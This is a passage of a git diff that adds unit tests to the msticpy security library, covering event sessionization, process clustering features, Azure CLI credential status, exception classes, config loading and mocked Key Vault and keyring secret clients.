+                    pd.to_datetime("2020-01-05 00:00:00", utc=True),
+                    pd.to_datetime("2020-01-05 00:21:00", utc=True),
+                    pd.to_datetime("2020-01-06 11:06:00", utc=True),
+                ],
+                "time_max": [
+                    pd.to_datetime("2020-01-03 00:01:00", utc=True),
+                    pd.to_datetime("2020-01-03 01:00:00", utc=True),
+                    pd.to_datetime("2020-01-05 00:00:00", utc=True),
+                    pd.to_datetime("2020-01-05 00:25:00", utc=True),
+                    pd.to_datetime("2020-01-06 11:06:00", utc=True),
+                ],
+                "operation_list": [["A", "B"], ["A"], ["C"], ["B", "C"], ["A"]],
+                "duration": [
+                    pd.to_timedelta(1, "min"),
+                    pd.to_timedelta(0, "min"),
+                    pd.to_timedelta(0, "min"),
+                    pd.to_timedelta(4, "min"),
+                    pd.to_timedelta(0, "min"),
+                ],
+                "number_events": [2, 1, 1, 2, 1],
+            }
+        )
+        self.df3 = pd.DataFrame(
+            {
+                "UserId": [np.nan, np.nan],
+                "time": [
+                    pd.to_datetime("2020-01-03 00:00:00", utc=True),
+                    pd.to_datetime("2020-01-03 00:01:00", utc=True),
+                ],
+                "operation": ["A", "B"],
+            }
+        )
+        self.df3_with_ses_col = pd.DataFrame(
+            {
+                "UserId": [np.nan, np.nan],
+                "time": [
+                    pd.to_datetime("2020-01-03 00:00:00", utc=True),
+                    pd.to_datetime("2020-01-03 00:01:00", utc=True),
+                ],
+                "operation": ["A", "B"],
+                "session_ind": [0, 0],
+            }
+        )
+        self.df3_sessionized = pd.DataFrame(
+            {
+                "UserId": [np.nan],
+                "time_min": [pd.to_datetime("2020-01-03 00:00:00", utc=True)],
+                "time_max": [pd.to_datetime("2020-01-03 00:01:00", utc=True)],
+                "operation_list": [["A", "B"]],
+                "duration": [pd.to_timedelta(1, "min")],
+                "number_events": [2],
+            }
+        )
+
+    def tearDown(self):
+        self.df1 = None
+        self.df1_with_ses_col = None
+        self.df1_sessionized = None
+        self.df2 = None
+        self.df2_with_ses_col_1 = None
+        self.df2_sessionized_1 = None
+        self.df2_with_ses_col_2 = None
+        self.df2_sessionized_2 = None
+        self.df3 = None
+        self.df3_with_ses_col = None
+        self.df3_sessionized = None
+
+    def test_create_session_col(self):
+        actual = sessionize.create_session_col(
+            data=self.df1,
+            user_identifier_cols=["UserId"],
+            time_col="time",
+            max_session_time_mins=20,
+            max_event_separation_mins=2,
+        )
+        assert actual.shape == self.df1_with_ses_col.shape
+
+        actual = sessionize.create_session_col(
+            data=self.df2,
+            user_identifier_cols=["UserId"],
+            time_col="time",
+            max_session_time_mins=20,
+            max_event_separation_mins=2,
+        )
+
+        assert_frame_equal(actual, self.df2_with_ses_col_1, check_dtype=False)
+
+        actual = sessionize.create_session_col(
+            data=self.df2,
+            user_identifier_cols=["UserId"],
+            time_col="time",
+            max_session_time_mins=20,
+            max_event_separation_mins=5,
+        )
+
+        assert_frame_equal(actual, self.df2_with_ses_col_2, check_dtype=False)
+
+        actual = sessionize.create_session_col(
+            data=self.df3,
+            user_identifier_cols=["UserId"],
+            time_col="time",
+            max_session_time_mins=20,
+            max_event_separation_mins=2,
+        )
+
+        assert_frame_equal(actual, self.df3_with_ses_col, check_dtype=False)
+
+    def test_sessionize_data(self):
+        actual = sessionize.sessionize_data(
+            data=self.df1,
+            user_identifier_cols=["UserId"],
+            time_col="time",
+            max_session_time_mins=20,
+            max_event_separation_mins=2,
+            event_col="operation",
+        )
+        assert actual.shape == self.df1_sessionized.shape
+
+        actual = sessionize.sessionize_data(
+            data=self.df2,
+            user_identifier_cols=["UserId"],
+            time_col="time",
+            max_session_time_mins=20,
+            max_event_separation_mins=2,
+            event_col="operation",
+        )
+
+        assert_frame_equal(actual, self.df2_sessionized_1, check_dtype=False)
+
+        actual = sessionize.sessionize_data(
+            data=self.df2,
+            user_identifier_cols=["UserId"],
+            time_col="time",
+            max_session_time_mins=20,
+            max_event_separation_mins=5,
+            event_col="operation",
+        )
+
+        assert_frame_equal(actual, self.df2_sessionized_2, check_dtype=False)
+
+        actual = sessionize.sessionize_data(
+            data=self.df3,
+            user_identifier_cols=["UserId"],
+            time_col="time",
+            max_session_time_mins=20,
+            max_event_separation_mins=2,
+            event_col="operation",
+        )
+
+        assert_frame_equal(actual, self.df3_sessionized, check_dtype=False)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/analysis/test_event_cluster.py b/tests/analysis/test_event_cluster.py
new file mode 100644
index 000000000..a80129c78
--- /dev/null
+++ b/tests/analysis/test_event_cluster.py
@@ -0,0 +1,124 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Event cluster test class."""
+import os
+import unittest
+
+import pandas as pd
+from msticpy.analysis.eventcluster import (
+    add_process_features,
+    char_ord_score,
+    char_ord_score_df,
+    crc32_hash,
+    crc32_hash_df,
+    dbcluster_events,
+    delim_count,
+    delim_count_df,
+    delim_hash,
+    token_count,
+    token_count_df,
+)
+
+from ..unit_test_lib import TEST_DATA_PATH
+
+
+class TestEventCluster(unittest.TestCase):
+    """Unit test class."""
+
+    def setUp(self):
+        input_file = os.path.join(TEST_DATA_PATH, "processes_on_host.csv")
+        self.input_df = pd.read_csv(input_file, parse_dates=["TimeGenerated"])
+
+    def test_cluster_features(self):
+        out_df = add_process_features(input_frame=self.input_df, path_separator="\\")
+
+        # processName: the process file name (minus path)
+        # commandlineLen: length of the command line
+        # commandlineLogLen: log10 length of commandline
+        # isSystemSession: 1 if session Id is 0x3e7 for Windows or -1 for Linux
+        # commandlineTokensFull: counts number of token separators in commandline
+        #     [\s\-\\/\.,"\'|&:;%$()]
+        # pathScore: sum of ord() value of characters in path
+        # commandlineScore: sum of ord() value of characters in commandline
+        # commandlineLogScore:
+        self.assertIn("processName", out_df.columns)
+        self.assertIn("commandlineLen", out_df.columns)
+        self.assertIn("commandlineLogLen", out_df.columns)
+        self.assertIn("isSystemSession", out_df.columns)
+        self.assertIn("commandlineTokensFull", out_df.columns)
+        self.assertIn("pathScore", out_df.columns)
+        self.assertIn("commandlineScore", out_df.columns)
+        self.assertIn("commandlineTokensHash", out_df.columns)
+        self.assertIn("pathHash", out_df.columns)
+
+    def test_custom_features(self):
+
+        input_str = (
+            "The quick & sly (as all foxes might be/or not) fox, jumped over a frog."
+        )
+        test_df = pd.DataFrame(data=[input_str], columns=["input"], index=[0])
+
+        test_df["tok_count"] = token_count_df(data=test_df, column="input")
+        test_df["char_score"] = char_ord_score_df(data=test_df, column="input")
+        test_df["delim_count"] = delim_count_df(data=test_df, column="input")
+        test_df["crc32"] = crc32_hash_df(data=test_df, column="input")
+        self.assertEqual(test_df["tok_count"].iloc[0], 15)
+        self.assertEqual(test_df["char_score"].iloc[0], 6199.0)
+        self.assertEqual(test_df["delim_count"].iloc[0], 20)
+        self.assertEqual(test_df["crc32"].iloc[0], 2011081507)
+
+        self.assertEqual(
+            test_df.apply(lambda x: token_count(x.input), axis=1).iloc[0], 15
+        )
+        self.assertEqual(
+            test_df.apply(lambda x: delim_count(x.input), axis=1).iloc[0], 20
+        )
+        self.assertEqual(
+            test_df.apply(lambda x: char_ord_score(x.input), axis=1).iloc[0], 6199.0
+        )
+        self.assertEqual(
+            test_df.apply(lambda x: crc32_hash(x.input), axis=1).iloc[0], 2011081507
+        )
+        self.assertEqual(
+            test_df.apply(lambda x: delim_hash(x.input), axis=1).iloc[0], 2337396062
+        )
+
+    def test_clustering(self):
+        out_df = add_process_features(input_frame=self.input_df, path_separator="\\")
+
+        output = dbcluster_events(
+            data=out_df,
+            cluster_columns=["pathScore", "commandlineTokensFull", "isSystemSession"],
+            verbose=False,
+            normalize=True,
+            time_column="TimeGenerated",
+            max_cluster_distance=0.0001,
+            min_cluster_samples=2,
+        )
+        out_df2, _, _ = output
+
+        self.assertIsNotNone(out_df2)
+        self.assertEqual(len(out_df2), 62)
+        self.assertEqual(out_df2["ClusterSize"].max(), 71)
+        self.assertEqual(out_df2["ClusterSize"].min(), 1)
+
+        output = dbcluster_events(
+            data=out_df,
+            cluster_columns=["pathHash", "commandlineTokensHash", "isSystemSession"],
+            verbose=False,
+            normalize=True,
+            time_column="TimeGenerated",
+            max_cluster_distance=0.001,
+            min_cluster_samples=2,
+        )
+        out_df3, _, _ = output
+
+        self.assertIsNotNone(out_df3)
+        self.assertEqual(len(out_df3), 121)
+        self.assertEqual(out_df3["ClusterSize"].max(), 70)
+        self.assertEqual(out_df3["ClusterId"].max(), 31)
+        self.assertEqual(out_df3["ClusterSize"].min(), 1)
+        self.assertEqual(len(out_df3[out_df3["ClusterId"] == -1]), 89)
diff --git a/tests/common/__init__.py b/tests/common/__init__.py
new file mode 100644
index 000000000..6ea13d44c
--- /dev/null
+++ b/tests/common/__init__.py
@@ -0,0 +1,6 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Init for test package."""
diff --git a/tests/common/test_azure_auth_core.py b/tests/common/test_azure_auth_core.py
new file mode 100644
index 000000000..24c34c2dd
--- /dev/null
+++ b/tests/common/test_azure_auth_core.py
@@ -0,0 +1,112 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Module docstring."""
+from datetime import datetime, timedelta
+from unittest.mock import patch
+
+import pytest
+import pytest_check as check
+from msrestazure import azure_cloud
+from msticpy.common.azure_auth_core import (
+    AzureCloudConfig,
+    default_auth_methods,
+    check_cli_credentials,
+    AzureCliStatus,
+)
+
+from ..unit_test_lib import custom_mp_config, get_test_data_path
+
+__author__ = "Ian Hellen"
+
+# pylint: disable=redefined-outer-name
+
+
+@pytest.fixture(scope="module")
+def mp_config_file():
+    """Fixture_docstring."""
+    return get_test_data_path().joinpath("msticpyconfig.yaml")
+
+
+def test_default_auth_methods(mp_config_file):
+    """Test default auth methods function."""
+    with custom_mp_config(mp_config_file):
+        check.is_in("env", default_auth_methods())
+        check.is_in("msi", default_auth_methods())
+        check.is_in("cli", default_auth_methods())
+        check.is_in("interactive", default_auth_methods())
+
+
+def test_azure_cloud_config(mp_config_file):
+    """Test the Azure cloud config."""
+    with custom_mp_config(mp_config_file):
+        az_config = AzureCloudConfig()
+    check.equal(az_config.cloud, "global")
+    check.is_in("env", az_config.auth_methods)
+    check.is_in("msi", az_config.auth_methods)
+    check.is_in("cli", az_config.auth_methods)
+    check.is_in("interactive", az_config.auth_methods)
+    glob_rm_uri = azure_cloud.AZURE_PUBLIC_CLOUD.endpoints.resource_manager
+    check.equal(f"{glob_rm_uri}.default", az_config.token_uri)
+
+
+_TOKEN_WRAPPER = ["Bearer", "__b64_str__"]
+
+_TOKEN = {
+    "tokenType": "Bearer",
+    "expiresIn": 3000,
+    "expiresOn": str(datetime.now() + timedelta(0.1)),
+    "resource": "https://management.core.windows.net/",
+    "accessToken": "_b64_token_string_",
+    "refreshToken": "_b64_token_string2_",
+}
+
+_CLI_TESTS = [
+    (({}, None), AzureCliStatus.CLI_OK),
+    (
+        ({"expiresOn": str(datetime.now() - timedelta(0.1))}, None),
+        AzureCliStatus.CLI_TOKEN_EXPIRED,
+    ),
+    (({}, ImportError), AzureCliStatus.CLI_NOT_INSTALLED),
+    (
+        ({}, ValueError("AADSTS70043: The refresh token has expired")),
+        AzureCliStatus.CLI_TOKEN_EXPIRED,
+    ),
+    (
+        ({}, ValueError("Please run 'az login' to setup account")),
+        AzureCliStatus.CLI_NEEDS_SIGN_IN,
+    ),
+    (({}, ValueError("Another error")), AzureCliStatus.CLI_UNKNOWN_ERROR),
+]
+
+
+def _test_ids(test_cases):
+    return [test[1].name for test in test_cases]
+
+
+class CliProfile:
+    """Mock Azure CLI profile class."""
+
+    def __init__(self, token):
+        """Initialize class with raw token."""
+        self.token = token
+
+    def get_raw_token(self):
+        """Return raw token"""
+        return (tuple([*_TOKEN_WRAPPER, self.token]), None, None)
+
+
+@patch(check_cli_credentials.__module__ + ".get_cli_profile")
+@pytest.mark.parametrize("test, expected", _CLI_TESTS, ids=_test_ids(_CLI_TESTS))
+def test_check_cli_credentials(get_cli_profile, test, expected):
+    """Test checking Azure CLI credentials."""
+    test_tok = {**_TOKEN}
+    test_tok.update(test[0])
+
+    get_cli_profile.return_value = CliProfile(test_tok)
+    if test[1]:
+        get_cli_profile.side_effect = test[1]
+
+    check.equal(check_cli_credentials()[0], expected)
diff --git a/tests/common/test_exceptions.py b/tests/common/test_exceptions.py
new file mode 100644
index 000000000..3ae30dd14
--- /dev/null
+++ b/tests/common/test_exceptions.py
@@ -0,0 +1,104 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Msticpy Exception test class."""
+from typing import List, Any, Tuple
+
+import pytest
+import pytest_check as check
+from pytest import raises
+
+# pylint: disable=relative-beyond-top-level, redefined-outer-name
+from msticpy.common.exceptions import (
+    MsticpyException,
+    MsticpyAzureConfigError,
+    MsticpyConfigException,
+    MsticpyKeyVaultConfigError,
+    MsticpyKeyVaultMissingSecretError,
+    MsticpyNoDataSourceError,
+    MsticpyNotConnectedError,
+    MsticpyResourceException,
+    MsticpyUserConfigError,
+    MsticpyUserError,
+)
+
+BASE_EX_CASES: List[Any] = [
+    MsticpyException,
+    MsticpyConfigException,
+    MsticpyResourceException,
+]
+
+USER_EX_CASES: List[Any] = [
+    MsticpyAzureConfigError,
+    MsticpyKeyVaultConfigError,
+    MsticpyKeyVaultMissingSecretError,
+    MsticpyNoDataSourceError,
+    MsticpyNotConnectedError,
+    MsticpyUserConfigError,
+    MsticpyUserError,
+]
+
+_TEST_ARG = "test arg"
+_TEST_URI = "https://msticpy.readthedocs.org/test"
+_OTHER_URI = "https://msticpy.readthedocs.org/test2"
+_TEST_TITLE = "test error"
+
+_TEST_EX_CASES: List[Tuple] = []
+tst_kwargs = dict(help_uri=_TEST_URI, title=_TEST_TITLE, other_uri=_OTHER_URI)
+for case in USER_EX_CASES:
+    _TEST_EX_CASES.append((case, [_TEST_ARG], tst_kwargs))
+
+
+# pylint: disable=protected-access
+def _create_and_capture_exception(ex_cls, *args, html_repr=True, **kwargs):
+    ex_inst = None
+    ex_html = None
+    ex_inst = ex_cls(*args, **kwargs)
+    ex_text = ex_inst._get_exception_text()
+    ex_html = ex_inst._repr_html_() if html_repr else ""
+    return ex_inst, ex_text, ex_html
+
+
+@pytest.fixture(params=_TEST_EX_CASES, ids=lambda t: t[0].__name__)
+def get_except_cases(request):
+    """Pytest fixture for parameterized tests."""
+    return request.param
+
+
+def test_user_exceptions(get_except_cases):
+    """Test user exceptions with messages to std out."""
+    ex_cls, ex_args, ex_kwargs = get_except_cases
+    with raises(ex_cls):
+        ex, ex_text, ex_html = _create_and_capture_exception(
+            ex_cls, *ex_args, **ex_kwargs
+        )
+        for expected_item in [_TEST_URI, _TEST_TITLE, _TEST_ARG, _OTHER_URI]:
+            check.is_in(expected_item, ex_text)
+            check.is_in(expected_item, ex_html)
+        raise ex
+
+
+@pytest.mark.parametrize("test_ex", BASE_EX_CASES)
+def test_base_exceptions(test_ex):
+    """Test simple MP Exceptions."""
+    with raises(test_ex):
+        raise test_ex(_TEST_ARG)
+
+
+def test_no_display_exceptions(get_except_cases):
+    """Test that no exception output is generated if suppressed."""
+    ex_cls, ex_args, ex_kwargs = get_except_cases
+    with raises(ex_cls):
+        with MsticpyUserError.no_display_exceptions():
+            ex, stdout_txt, html = _create_and_capture_exception(
+                ex_cls, *ex_args, html_repr=False, **ex_kwargs
+            )
+            for expected_item in [_TEST_URI, _TEST_TITLE, _TEST_ARG, _OTHER_URI]:
+                # we can't reliably check for full content since redirect_stdout
+                # is a global capture and other things outputting to std_out
+                # might truncate or overwrite this.
+                check.is_true(stdout_txt)
+                check.is_not_in(expected_item, html)
+            raise ex
diff --git a/tests/common/test_pkg_config.py b/tests/common/test_pkg_config.py
new file mode 100644
index 000000000..b89ab38b0
--- /dev/null
+++ b/tests/common/test_pkg_config.py
@@ -0,0 +1,143 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Pkg_config test class."""
+import unittest
+import os
+from pathlib import Path
+import warnings
+
+import pytest
+import yaml
+
+from msticpy.common import pkg_config
+from msticpy.sectools.geoip import IPStackLookup, GeoLiteLookup
+
+from ..unit_test_lib import get_test_data_path, custom_mp_config
+
+_TEST_DATA = get_test_data_path()
+
+# pylint: disable=protected-access
+
+
+class TestPkgConfig(unittest.TestCase):
+    """Unit test class."""
+
+    def test_load_default(self):
+        """Test load default settings."""
+        self.assertTrue(hasattr(pkg_config, "settings"))
+        self.assertTrue(hasattr(pkg_config, "default_settings"))
+        self.assertTrue(hasattr(pkg_config, "custom_settings"))
+        settings = pkg_config.settings
+        self.assertIn("QueryDefinitions", settings)
+        self.assertIn("Default", settings["QueryDefinitions"])
+        self.assertEqual(1, len(settings["QueryDefinitions"]["Default"]))
+        for path in settings["QueryDefinitions"]["Default"]:
+            self.assertTrue(type(path), str)
+            path = "data/" + path
+            self.assertTrue(
+                Path(pkg_config.__file__)
+                .resolve()
+                .parent.parent.joinpath(path)
+                .is_dir()
+            )
+
+    def test_custom_config(self):
+        """Test load queries from custom path."""
+        test_config1 = Path(_TEST_DATA).joinpath(pkg_config._CONFIG_FILE)
+        with custom_mp_config(test_config1):
+
+            self.assertTrue(hasattr(pkg_config, "settings"))
+            self.assertTrue(hasattr(pkg_config, "default_settings"))
+            self.assertTrue(hasattr(pkg_config, "custom_settings"))
+            settings = pkg_config.settings
+
+            # Query Definitions
+            self.assertIn("QueryDefinitions", settings)
+            self.assertIn("Default", settings["QueryDefinitions"])
+            self.assertEqual(1, len(settings["QueryDefinitions"]["Custom"]))
+            for path in settings["QueryDefinitions"]["Custom"]:
+                self.assertTrue(type(path), str)
+                self.assertTrue(
+                    Path(__file__).resolve().parent.parent.joinpath(path).is_dir()
+                )
+
+            # TI Providers
+            self.assertGreaterEqual(len(settings["TIProviders"]), 4)
+            self.assertIsInstance(settings["TIProviders"], dict)
+            for _, prov in settings["TIProviders"].items():
+
+                self.assertIn("Primary", prov)
+                self.assertIn("Provider", prov)
+                if "Args" in prov:
+                    self.assertIsInstance(prov["Args"], dict)
+                    for arg_name, arg_val in prov["Args"].items():
+                        self.assertIn(
+                            arg_name, ["ApiID", "AuthKey", "WorkspaceID", "TenantID"]
+                        )
+                        self.assertTrue(
+                            isinstance(arg_val, str)
+                            or "EnvironmentVar" in arg_val
+                            or "KeyVaultURI" in arg_val
+                        )
+
+    def test_geo_ip_settings(self):
+        """Test get geo_ip_settings."""
+        if "MAXMIND_AUTH" not in os.environ:
+            os.environ["MAXMIND_AUTH"] = "Testkey"
+        test_config1 = Path(_TEST_DATA).joinpath(pkg_config._CONFIG_FILE)
+        with custom_mp_config(test_config1):
+
+            with open(test_config1, encoding="utf-8") as f_handle:
+                config_settings = yaml.safe_load(f_handle)
+            conf_dbpath = (
+                config_settings.get("OtherProviders", {})
+                .get("GeoIPLite", {})
+                .get("Args", {})
+                .get("DBFolder")
+            )
+            conf_dbpath = str(Path(conf_dbpath).expanduser())
+
+            with warnings.catch_warnings():
+                # We want to ignore warnings from failure to download DB file
+                warnings.simplefilter("ignore", category=UserWarning)
+                geoip_lite = GeoLiteLookup()
+            self.assertIsInstance(geoip_lite._api_key, str)
+            self.assertEqual(geoip_lite._api_key, os.environ["MAXMIND_AUTH"])
+
+            self.assertEqual(geoip_lite._dbfolder, conf_dbpath)
+
+            ipstack = IPStackLookup()
+            self.assertEqual(ipstack._api_key, "987654321-222")
+
+    @pytest.mark.skipif(
+        os.environ.get("MSTICPY_BUILD_SOURCE", "").casefold() == "fork",
+        reason="External fork.",
+    )
+    def test_validate_config(self):
+        """Test config validation function."""
+        test_config1 = Path(_TEST_DATA).joinpath(pkg_config._CONFIG_FILE)
+        with custom_mp_config(test_config1):
+            results = pkg_config.validate_config()
+            self.assertGreater(len(results[0]), 1)
+            # save env vars
+            vt_auth_save = os.environ.get("VTAUTHKEY", "")
+            xf_id__save = os.environ.get("XFORCE_ID", "")
+            xf_auth_save = os.environ.get("XFORCE_KEY", "")
+            xf_auth_save = os.environ.get("MAXMIND_AUTH", "")
+            # set to some value
+            os.environ["VTAUTHKEY"] = "myXfId"
+            os.environ["XFORCE_ID"] = "myXfId"
+            os.environ["XFORCE_KEY"] = "myXfId"
+            os.environ["MAXMIND_AUTH"] = "myXfId"
+            pkg_config.refresh_config()
+            results = pkg_config.validate_config()
+            self.assertEqual(results, ([], []))
+
+            # restore env vars to original
+            os.environ["VTAUTHKEY"] = vt_auth_save
+            os.environ["XFORCE_ID"] = xf_id__save
+            os.environ["XFORCE_KEY"] = xf_auth_save
+            os.environ["MAXMIND_AUTH"] = xf_auth_save
diff --git a/tests/common/test_provider_secrets.py b/tests/common/test_provider_secrets.py
new file mode 100644
index 000000000..9d05c1e64
--- /dev/null
+++ b/tests/common/test_provider_secrets.py
@@ -0,0 +1,549 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""datq query test class."""
+from copy import deepcopy
+from collections import namedtuple
+import unittest
+from unittest.mock import patch, MagicMock
+import os
+from pathlib import Path
+import warnings
+
+import keyring
+
+from azure.core.exceptions import ResourceNotFoundError
+
+from msticpy.common import secret_settings
+from msticpy.common.keyvault_client import (
+    # AuthClient,
+    # KeyringAuthClient,
+    BHKeyVaultClient,
+    BHKeyVaultMgmtClient,
+    KeyVaultSettings,
+    MsticpyKeyVaultConfigError,
+    MsticpyKeyVaultMissingSecretError,
+)
+from msticpy.common import pkg_config
+from msticpy.common.provider_settings import get_provider_settings
+from msticpy.common.utility import set_unit_testing
+
+from ..unit_test_lib import get_test_data_path, custom_mp_config
+
+_TEST_DATA = get_test_data_path()
+
+# set a flag to indicate we're in a unit test
+set_unit_testing(True)
+
+# pylint: disable=invalid-name, no-member, attribute-defined-outside-init
+# pylint: disable=protected-access, unused-argument, super-init-not-called
+# flake8: noqa
+
+# Unit test mock patches
+az_connect_core_patch = BHKeyVaultMgmtClient.__module__ + ".az_connect_core"
+sec_client_patch = BHKeyVaultMgmtClient.__module__ + ".SecretClient"
+is_ipython_patch = BHKeyVaultMgmtClient.__module__ + ".is_ipython"
+display_patch = BHKeyVaultMgmtClient.__module__ + ".display"
+HTML_patch = BHKeyVaultMgmtClient.__module__ + ".HTML"
+basic_tok_auth_patch = BHKeyVaultMgmtClient.__module__ + ".BasicTokenAuthentication"
+kv_mgmt_client_patch = BHKeyVaultMgmtClient.__module__ + ".KeyVaultManagementClient"
+
+
+# Test classes used in unit tests
+class _KeyringTestBackend(keyring.backend.KeyringBackend):
+    """TestKeyring that returns mocked passwords."""
+
+    priority = -1
+
+    def __init__(self):  # noqa
+        self._secrets = {}
+        self._secrets.update(KV_SECRETS)
+        super().__init__()
+
+    def get_password(self, service, username):
+
+        return self._secrets.get(username, None)
+
+    def set_password(self, service, username, password=None):
+        self._secrets[username] = password
+
+    def delete_password(self, service, username):
+        self._secrets.pop(username, None)
+
+
+class _SecretClientTest:
+    """TestKeyring that returns mocked passwords."""
+
+    priority = -1
+
+    def __init__(self):
+        self._secrets = {}
+        self._secrets.update(KV_SECRETS)
+        self._sec_props = {name: _KVTestSec(name) for name in KV_SECRETS}
+
+    def get_secret(self, name, *args, **kwargs):
+        del args, kwargs
+        if name not in self._secrets:
+            raise ResourceNotFoundError(f"Missing secret {name}")
+        sec_bundle = _KVTestSec(obj_id=name)
+        sec_bundle.value = self._secrets[name]
+        return sec_bundle
+
+    def set_secret(self, name, value, *args, **kwargs):
+        del args, kwargs
+        self._secrets[name] = value
+        sec_bundle = _KVTestSec(obj_id=name)
+        sec_bundle.value = self._secrets[name]
+
+        self._sec_props[name] = sec_bundle
+        return sec_bundle
+
+    def list_properties_of_secrets(self):
+        return self._sec_props.values()
+
+
+class _KVTestSec:
+    URI = "https://myvault.vault.azure.net/secrets/{name}"
+
+    def __init__(self, obj_id):
+        self.name = obj_id
+        self.id = self.URI.format(name=obj_id)
+
+
+class _KeyVaultMgmtMock:
+    def __init__(self):
+        self.vaults = _KeyVaultVaultsMock()
+
+
+class _KeyVaultVaultsMock:
+    def __init__(self):
+        self.vaults = {}
+
+    def list(self):
+        return self.vaults.values()
+
+    def get(self, res_group, vault_name):
+        return self.vaults.get(vault_name, None)
+
+    def create_or_update(self, res_group, vault_name, params):
+        vault = _KeyVaultVaultMock(vault_name)
+        vault.params = params
+        vault.resource_group = res_group
+        self.vaults[vault_name] = vault
+        return vault
+
+
+class _KeyVaultPropsMock:
+    pass
+
+
+class _KeyVaultVaultMock:
+    URI_TEMPLT = "https://{vault}.vault.azure.net"
+
+    def __init__(self, name):
+        self.name = name
+        props = _KeyVaultPropsMock()
+        props.vault_uri = self.URI_TEMPLT.format(vault=name)
+        self.properties = props
+
+    def result(self):
+        return self
+
+
+# The actual unit test class
+class TestSecretsConfig(unittest.TestCase):
+    """Unit test class."""
+
+    def setUp(self):
+        """Create keyring for tests."""
+        keyring.set_keyring(_KeyringTestBackend())
+
+    def test_keyring_client(self):
+        """Test keyring client."""
+        kr_client = secret_settings.KeyringClient()
+
+        for sec_name, pwd in KV_SECRETS.items():
+            self.assertEqual(pwd, kr_client.get_secret(sec_name))
+
+        self.assertIsNone(kr_client.get_secret("DoesntExist"))
+        kr_client.set_secret("new_secret", "secret_value")
+        self.assertEqual("secret_value", kr_client.get_secret("new_secret"))
+
+        self.assertEqual("secret_value", kr_client["new_secret"])
+        # pylint: disable=pointless-statement
+        with self.assertRaises(KeyError):
+            kr_client["DoesntExist"]
+
+    def test_config_load(self):
+        """Test loading configuration from msticpyconfig."""
+        expected = {
+            "TenantId": "72f988bf-86f1-41af-91ab-2d7cd011db47",
+            "SubscriptionId": "40dcc8bf-0478-4f3b-b275-ed0a94f2c013",
+            "ResourceGroup": "ASIHuntOMSWorkspaceRG",
+            "AzureRegion": "East US",
+            "VaultName": "mstic-ianhelle",
+            "UseKeyring": True,
+            "Authority": "global",
+        }
+
+        kv_settings = get_kv_settings("msticpyconfig-kv.yaml")
+        self.assertEqual(kv_settings.get("TenantId"), expected["TenantId"])
+        self.assertEqual(kv_settings["TenantId"], expected["TenantId"])
+        self.assertIn("TenantId", kv_settings)
+        self.assertIsNone(kv_settings.get("NotATenantId"))
+
+        self.assertEqual(kv_settings.authority_uri, "https://login.microsoftonline.com")
+        self.assertEqual(
+            kv_settings.get_tenant_authority_uri(),
+            "https://login.microsoftonline.com/72f988bf-86f1-41af-91ab-2d7cd011db47",
+        )
+        self.assertEqual(
+            kv_settings.get_tenant_authority_uri(tenant="myorg.com"),
+            "https://login.microsoftonline.com/myorg.com",
+        )
+        self.assertEqual(
+            kv_settings.get_tenant_authority_host(),
+            "login.microsoftonline.com/72f988bf-86f1-41af-91ab-2d7cd011db47",
+        )
+        self.assertEqual(
+            kv_settings.get_tenant_authority_host(tenant="myorg.com"),
+            "login.microsoftonline.com/myorg.com",
+        )
+
+        for attrib in expected:
+            self.assertEqual(kv_settings[attrib], expected[attrib])
+
+        kv_settings.authority = "usgov"
+        self.assertEqual(kv_settings.authority_uri, "https://login.microsoftonline.us")
+        self.assertEqual(
+            kv_settings.keyvault_uri, "https://{vault}.vault.usgovcloudapi.net"
+        )
+        self.assertEqual(kv_settings.mgmt_uri, "https://management.usgovcloudapi.net/")
+
+        kv_settings.authority = "de"
+        self.assertEqual(kv_settings.authority_uri, "https://login.microsoftonline.de")
+
+        kv_settings.authority = "cn"
+        self.assertEqual(kv_settings.authority_uri, "https://login.chinacloudapi.cn")
+
+    @patch(sec_client_patch)
+    @patch(az_connect_core_patch)
+    def test_keyvault_client(
+        self,
+        az_connect_core,
+        sec_client,
+    ):
+        kv_sec_client = _SecretClientTest()
+        sec_client_obj = MagicMock()
+        sec_client_obj.list_properties_of_secrets = (
+            kv_sec_client.list_properties_of_secrets
+        )
+        sec_client_obj.get_secret = kv_sec_client.get_secret
+        sec_client_obj.set_secret = kv_sec_client.set_secret
+        sec_client.return_value = sec_client_obj
+        # call_prompt = lambda client_id, authority, prompt_callback: _prompt_for_code(
+        #    DEV_CODE
+        # )
+        # az_connect_core_patch.side_effect = call_prompt
+        kv_settings = get_kv_settings("msticpyconfig-kv.yaml")
+
+        # Check both vault params
+        BHKeyVaultClient(
+            tenant_id=kv_settings.tenantid,
+            vault_uri="https://myvault.vault.azure.net",
+            debug=True,
+        )
+        BHKeyVaultClient(
+            tenant_id=kv_settings.tenantid, vault_name="myvault", debug=True
+        )
+
+        # Check missing tenantid
+        no_tenant_id = deepcopy(kv_settings)
+        no_tenant_id.tenantid = None
+        with self.assertRaises(MsticpyKeyVaultConfigError):
+            BHKeyVaultClient(settings=no_tenant_id, debug=True)
+
+        keyvault_client = BHKeyVaultClient(debug=True)
+
+        # Check secret methods
+        for sec_id in keyvault_client.secrets:
+            sec_name = sec_id.split("/")[-1]
+            self.assertIn(sec_name, KV_SECRETS)
+
+        for sec, val in KV_SECRETS.items():
+            kv_val = keyvault_client.get_secret(sec)
+            self.assertEqual(val, kv_val)
+
+        with self.assertRaises(MsticpyKeyVaultMissingSecretError):
+            keyvault_client.get_secret("DoesntExist")
+
+        kv_sec_client.set_secret("NoSecret", "")
